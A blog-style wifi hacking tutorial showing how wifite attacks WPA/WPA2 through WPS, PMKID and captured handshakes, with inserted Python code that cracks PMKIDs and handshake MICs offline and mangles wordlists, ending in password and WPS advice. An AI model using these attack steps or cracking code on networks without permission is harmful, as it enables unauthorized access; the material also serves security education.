How to hack a wifi and how to secure yours

How to get into a WPA/WPA2 protected wifi network with wifite and how to avoid being hacked

French Eagle
6 min read · Oct 24, 2020
[Cover image: illustration of a hacker. Photo by Jefferson Santos on Unsplash]

Before I start, I would like to remind you that WPA2 is still considered secure today. If your wifi password is something other than “qwerty” or “batman”, you should be fine. But in some cases we will be able to get into a wifi network without knowing the password beforehand: either through a flaw in the access point itself (WPS), or by capturing material that lets us test passphrase guesses offline, as fast as our hardware allows.

For this demonstration I will be using Kali Linux 2020.2a (you can download it for free at https://www.kali.org) and an ALFA Network AWUS036NHA adapter. You can find it for less than $30 on Amazon. This particular adapter is popular because its Atheros chipset supports monitor mode and packet injection with the in-tree Linux driver (ath9k_htc), which is what wifite needs; plug it in and it should work out of the box.

Like the title says, we’re going to use a program called Wifite2.

What’s Wifite?

Wifite is a wrapper that automates wifi auditing: it drives the underlying tools for you (aircrack-ng, reaver, bully, hcxdumptool/hcxpcapngtool, hashcat), so you pick a target and it runs the attacks one after the other. The project and its README are on GitHub: https://github.com/derv82/wifite2

Disclaimer

I remind you that it is illegal to attack a system you don’t have permission to attack. This demonstration is for educational purposes only. In this post I’ll use my own wifi. You shouldn’t try it on someone else’s wifi.

Enough talking, let’s hack

Wifite2 is already installed in the standard version of kali Linux, so I’ll skip the installation part. Open a terminal and start wifite.

sudo wifite -mac

Note: I use -mac to randomize my MAC address, which is useful to avoid being tracked. However, it doesn’t make you invisible: the deauthentication and probe frames wifite sends are still visible to anyone monitoring the channel, and the randomized address still shows up in the access point’s logs.

All wifi access points discovered by your adapter will be displayed. To stop scanning, press CTRL+C, then enter the number of the network you want to attack.

For the demonstration, I’ll use my phone hotspot Téléphone Mi.

From now on, everything is automatic. Wifite tries several methods in turn to get into the wifi: WPS first, then PMKID, then the 4-way handshake.

WPS attack (pixie dust)

If the access point you’re trying to hack has WPS enabled, wifite tries the known WPS weaknesses, just in case the access point is vulnerable to one of them (a number of models are): the Pixie Dust attack, which exploits predictable nonces in some chipsets to recover the WPS PIN offline in seconds, and the online PIN brute force, which works because the access point checks the 8-digit PIN in two halves. Either way, a valid PIN makes the access point hand over the WPA passphrase directly, no cracking needed. Here is a list of vulnerable devices. My phone’s hotspot doesn’t have WPS, so I’ll skip those steps.
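To see why the online PIN attack is feasible at all, here is an added example (not code from the original post, nor from wifite, reaver or bully) that implements the WPS PIN checksum and counts the candidates an attacker actually has to send. The "classic default PIN" used at the bottom is just a well-known sample value for the checksum, not a claim about any device.

```python
# Added example, not from the original post or from wifite/reaver: why an online
# WPS PIN brute force is feasible. The AP checks the 8-digit PIN in two halves
# (it answers M4 with a NACK if digits 1-4 are wrong, and M6 with a NACK if
# digits 5-8 are wrong) and digit 8 is a checksum of the first 7, so the
# attacker never needs anything close to 10^8 tries.


def wps_checksum(first7: str) -> int:
    """Checksum digit for a 7-digit WPS PIN prefix (weights 3,1,3,1,3,1,3 from the left)."""
    if len(first7) != 7 or not first7.isdigit():
        raise ValueError("expected exactly 7 digits")
    acc = sum((3 if i % 2 == 0 else 1) * int(d) for i, d in enumerate(first7))
    return (10 - acc % 10) % 10


def is_valid_wps_pin(pin: str) -> bool:
    """True if an 8-digit PIN carries the right checksum digit."""
    return len(pin) == 8 and pin.isdigit() and int(pin[7]) == wps_checksum(pin[:7])


def wps_search_space() -> dict:
    """Worst-case number of registrar exchanges for each guessing strategy."""
    return {
        "naive_8_digits": 10 ** 8,
        "checksum_only": 10 ** 7,                        # digit 8 is fixed by digits 1-7
        "split_halves_no_checksum": 10 ** 4 + 10 ** 4,
        "split_halves_with_checksum": 10 ** 4 + 10 ** 3,  # what reaver/bully exploit
    }


def first_half_candidates():
    """Every possible first half, 0000..9999; the AP confirms it on its own."""
    return [f"{n:04d}" for n in range(10 ** 4)]


def second_half_candidates(first_half: str):
    """Once digits 1-4 are confirmed, only 1000 full PINs remain (digit 8 is forced)."""
    for n in range(10 ** 3):
        prefix = first_half + f"{n:03d}"
        yield prefix + str(wps_checksum(prefix))


if __name__ == "__main__":
    print(wps_search_space())
    print("12345670 valid:", is_valid_wps_pin("12345670"))  # classic sample PIN
```

11,000 exchanges at a few seconds each is hours, not years, which is why many access points now lock WPS after a handful of failed PINs, and why wifite moves on when it sees that lockout.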

PMKID attack

This is a “new” method, published in 2018 by the hashcat developers, for getting crackable material without needing a connected client (for the experts: no need for the 4-way handshake). Some access points include a PMKID in the first EAPOL message they send right after an association request; the PMKID is an HMAC keyed with the PMK, which itself is derived from the passphrase and the SSID, so it can be attacked offline exactly like a handshake. It doesn’t work on all devices (many recent ones no longer send it), but it’s worth trying.

Note: if you successfully get a PMKID with this method, you still have to crack it (see below); hashcat accepts both PMKIDs and handshakes as input.

Unfortunately, in our case it failed.
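Here is an added example, not code from the original post, from wifite or from hashcat, showing how the PMKID is derived and why capturing one is enough to start guessing offline. The SSID, MAC addresses and wordlist are constructed sample values; we play the access point ourselves to obtain a target, and the hashcat line format is the mode 22000 PMKID form (type 01).

```python
# Added example, not from the original post, wifite or hashcat: how a PMKID is
# computed and why capturing one is enough to start guessing. The SSID, MAC
# addresses and wordlist are constructed sample values, not captured data.
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-Personal PMK: PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 rounds, 32 bytes).
    The 4096 rounds are the whole reason each guess is so expensive."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AP MAC || client MAC).
    Some APs put this in the RSN IE of EAPOL message 1, right after association."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def hashcat_22000_line(pmkid_value: bytes, ap_mac: bytes, sta_mac: bytes, ssid: str) -> str:
    """The PMKID line format (type 01) accepted by hashcat mode 22000."""
    return "WPA*01*{}*{}*{}*{}***".format(
        pmkid_value.hex(), ap_mac.hex(), sta_mac.hex(), ssid.encode().hex())


def crack_pmkid(target: bytes, ap_mac: bytes, sta_mac: bytes, ssid: str, wordlist):
    """Offline dictionary attack: recompute the PMKID for each candidate passphrase."""
    for candidate in wordlist:
        candidate = candidate.strip()
        if not 8 <= len(candidate) <= 63:      # not a legal WPA passphrase, skip
            continue
        if pmkid(pmk_from_passphrase(candidate, ssid), ap_mac, sta_mac) == target:
            return candidate
    return None


# Constructed scenario: the "AP" side first, then the attacker's side.
SSID = "Téléphone Mi"
AP_MAC = bytes.fromhex("02aabbccddee")     # locally administered, made up
STA_MAC = bytes.fromhex("021122334455")    # made up
WORDLIST = ["password", "batman", "qwerty123", "slimshady", "SlimShady1"]   # constructed


def captured_pmkid(real_passphrase: str) -> bytes:
    """What the victim AP computes; we play the AP here to obtain a target."""
    return pmkid(pmk_from_passphrase(real_passphrase, SSID), AP_MAC, STA_MAC)


def demo() -> str:
    target = captured_pmkid("slimshady")
    print(hashcat_22000_line(target, AP_MAC, STA_MAC, SSID))
    return crack_pmkid(target, AP_MAC, STA_MAC, SSID, WORDLIST)


if __name__ == "__main__":
    print("cracked:", demo())
```

You can sanity-check the PMK derivation against `wpa_passphrase <ssid> <passphrase>` from wpa_supplicant, which prints the same 32-byte PSK. Note that the AP never needs a real client here: the attacker associates itself, reads the PMKID out of the first EAPOL frame, and walks away.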

Handshake attack

Last but not least, the handshake attack. It takes place in two steps: first we capture the 4-way handshake, then we crack it.

Stealing the handshake

The point of this attack is to briefly disconnect an already connected user: wifite sends deauthentication frames spoofed as coming from the access point, the client reconnects, and the 4-way handshake it performs with the access point is recorded. The handshake is not secret material by itself: it contains the two MAC addresses, two random nonces and a message integrity code (MIC) computed with a key derived from the passphrase, which is exactly what an offline guessing attack needs. In order to succeed, at least one device has to be connected to the access point.

Wifite is listening, but no device is connected to the wifi, so nothing happens. Let’s connect a phone to it.

Wifite discovered a new client and successfully stole the handshake.

Cracking the handshake

We’re not done yet. The handshake doesn’t contain the passphrase; we still have to crack it, that is, test candidate passphrases against the captured MIC until one matches. A few methods are available to pick the candidates.
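What “cracking the handshake” actually computes, as an added example that is not code from the original post, from wifite or from aircrack-ng: the EAPOL-Key message 2 below is constructed in the 802.11i layout with made-up MACs and nonces rather than taken from a capture, and we build it as the legitimate client would before attacking it as wifite/aircrack-ng would.

```python
# Added example, not from the original post, wifite or aircrack-ng: what
# "cracking the handshake" really computes. Nothing in the 4-way handshake is
# encrypted; the capture gives both MACs, both nonces and a MIC over message 2,
# and the attacker recomputes that MIC for each candidate passphrase. The
# EAPOL-Key frame below is constructed in the 802.11i layout, not captured.
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11i PRF-512: PTK = PRF(PMK, "Pairwise key expansion", min/max of MACs and nonces)."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    out = b""
    for i in range(4):                      # 4 x 160 bits >= 512 bits
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                        hashlib.sha1).digest()
    return out[:64]


# EAPOL-Key offsets: hdr(4) type(1) info(2) len(2) replay(8) nonce(32) iv(16) rsc(8) id(8) mic(16)
NONCE_OFFSET = 17
MIC_OFFSET = 81


def eapol_key_msg2(snonce: bytes, key_data: bytes = b"") -> bytes:
    """Minimal WPA2 message 2 (RSN descriptor, key info 0x010a = HMAC-SHA1 MIC + pairwise), MIC zeroed."""
    body = (bytes([0x02]) + (0x010a).to_bytes(2, "big") + (16).to_bytes(2, "big")
            + (1).to_bytes(8, "big") + snonce + bytes(16) + bytes(8) + bytes(8)
            + bytes(16) + len(key_data).to_bytes(2, "big") + key_data)
    return bytes([0x02, 0x03]) + len(body).to_bytes(2, "big") + body


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """WPA2 (descriptor version 2): HMAC-SHA1-128 over the frame with the MIC field zeroed."""
    zeroed = frame[:MIC_OFFSET] + bytes(16) + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def client_message2(passphrase, ssid, ap_mac, sta_mac, anonce, snonce) -> bytes:
    """What a legitimate client sends: message 2 with the MIC filled in (KCK = PTK[0:16])."""
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    frame = eapol_key_msg2(snonce)
    return frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + 16:]


def crack_handshake(ssid, ap_mac, sta_mac, anonce, msg2, wordlist):
    """Offline attack: per candidate, PMK -> PTK -> KCK -> MIC, compared with the captured MIC."""
    captured_mic = msg2[MIC_OFFSET:MIC_OFFSET + 16]
    snonce = msg2[NONCE_OFFSET:NONCE_OFFSET + 32]
    for candidate in wordlist:
        candidate = candidate.strip()
        if not 8 <= len(candidate) <= 63:   # not a legal WPA passphrase, skip
            continue
        kck = ptk_from_pmk(pmk_from_passphrase(candidate, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, msg2), captured_mic):
            return candidate
    return None


# Constructed scenario (made-up MACs and nonces; nonces are random in a real capture).
SSID = "Téléphone Mi"
AP_MAC = bytes.fromhex("02aabbccddee")
STA_MAC = bytes.fromhex("021122334455")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
WORDLIST = ["password", "qwerty123", "slimshady", "SlimShady1"]   # constructed


def demo() -> str:
    captured = client_message2("slimshady", SSID, AP_MAC, STA_MAC, ANONCE, SNONCE)
    return crack_handshake(SSID, AP_MAC, STA_MAC, ANONCE, captured, WORDLIST)


if __name__ == "__main__":
    print("cracked:", demo())
```

Two things this makes visible: the ANonce comes from message 1 (or 3) and the SNonce and MIC from message 2, so a capture with only one side of the exchange is useless, and the whole cost of a guess is the PBKDF2 call, not the MIC; that is why GPUs, not wordlist size, decide how far an attacker gets.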

The brute-force attack: trying every possible combination, aaaaaaaa, aaaaaaab, aaaaaaac … until we find the password.

Depending on the password strength, this takes a few seconds or millions of years. A WPA passphrase is between 8 and 63 characters long, and each guess costs 4096 rounds of PBKDF2-HMAC-SHA1 by design, so an ordinary CPU tests only a few thousand guesses per second and a high-end GPU on the order of a million. Even 8 random printable characters (95^8, roughly 6.6 × 10^15 guesses) would keep a GPU busy for centuries. Not really optimal…

This is where wordlists come into play.

A wordlist is a list of probable passwords. The longer the list, the better your chances of finding the password. There are a lot of wordlists on the internet, some simple, some very sophisticated. To get an idea, a really famous one is rockyou.txt, which contains around 14 million passwords from the RockYou breach; Kali ships it compressed as /usr/share/wordlists/rockyou.txt.gz, so run gunzip on it first.

To demonstrate the importance of password strength, I’ll protect my wifi with several passwords of increasing difficulty.

Using a weak password

The first password I used was slimshady.

Not much of a surprise: it took less than a second to crack it with wifite’s default wordlist. See how easy it was?

Using a not so weak password

Let’s try with SlimShady1.

The default wordlist didn’t find it. That’s a good thing. But let’s try with the rockyou wordlist. We tell wifite we want to crack a handshake we already captured (with --crack), and where our dictionary is (with --dict).

sudo wifite --crack --dict yourFolder/rockyou.txt

Then we select the handshake we want (here it’s 1) and the cracking tool (here I’ll go with aircrack). Wifite writes the aircrack-ng command for us. Isn’t it amazing?

After an hour or so, the password was found too.
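A passphrase like SlimShady1 is only a capitalization and a digit away from a dictionary word, and cracking tools exploit exactly that. The added example below (not code from the original post, from wifite, aircrack-ng or hashcat) applies a constructed subset of hashcat-style mangling rules to a base word and shows how few candidates separate “slimshady” from “SlimShady1”; the rule set and the sample words are assumptions for illustration, not hashcat’s own rule files.

```python
# Added example, not from the original post, wifite, aircrack-ng or hashcat: why
# a small wordlist plus mangling rules reaches passwords like "SlimShady1". The
# rules below are a constructed subset that mimics common hashcat-style rules
# (case changes, single-position case toggles, leetspeak, appended digits and
# years); they are not hashcat's own rule files.
LEET = str.maketrans({"a": "4", "e": "3", "i": "1", "o": "0", "s": "5"})
SUFFIXES = ([str(d) for d in range(10)] + ["!", "123", "1234"]
            + [str(y) for y in range(1990, 2021)])


def toggle_at(word: str, i: int) -> str:
    """Flip the case of one character (the hashcat 'T' rule)."""
    return word[:i] + word[i].swapcase() + word[i + 1:]


def case_variants(word: str):
    """lower / Capitalized / UPPER forms, plus every single-position toggle of the first two."""
    out = {word, word.lower(), word.capitalize(), word.upper()}
    for base in (word.lower(), word.capitalize()):
        out.update(toggle_at(base, i) for i in range(len(base)))
    return out


def mangle(word: str):
    """All candidates derived from one base word."""
    out = set()
    for v in case_variants(word):
        out.add(v)
        out.add(v.translate(LEET))
        out.update(v + s for s in SUFFIXES)
    return out


def wpa_candidates(words):
    """Expand each wordlist entry, keep legal WPA passphrase lengths (8-63), drop duplicates."""
    seen = set()
    for word in words:
        for cand in mangle(word.strip()):
            if 8 <= len(cand) <= 63 and cand not in seen:
                seen.add(cand)
                yield cand


def expansion_factor(word: str) -> int:
    """How many candidates one base word becomes: the price an attacker pays per dictionary entry."""
    return sum(1 for _ in wpa_candidates([word]))


if __name__ == "__main__":
    cands = set(wpa_candidates(["slimshady"]))
    print(len(cands), "candidates from one word; SlimShady1 reachable:", "SlimShady1" in cands)
```

A few hundred variants per word is nothing at the guess rates discussed above, so a password built from one dictionary word is cracked whether or not that exact spelling is in the list. hashcat does this with `-r` and its bundled rule files; aircrack-ng, which wifite used here, only takes the list as-is, which is why rockyou had to contain SlimShady1 verbatim.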

Using a really strong password

If you’re using a really strong password, there is little to no chance we can crack it. If the password is not in the wordlist, and not a simple variation of something in it, we can’t crack the handshake no matter how big a wordlist we use; and past a dozen or so random characters, brute force is out of reach as well.

Conclusion

WPA/WPA2 wifi security mostly relies on the password. A few access point models on the market have exploitable flaws (WPS in particular), but they are the exception. The default password printed on the router is usually a good one, unless it is derived predictably from the SSID or MAC address as some older ISP routers did. If you change it, make sure it is a long, random passphrase, and disable WPS while you are in the admin interface!
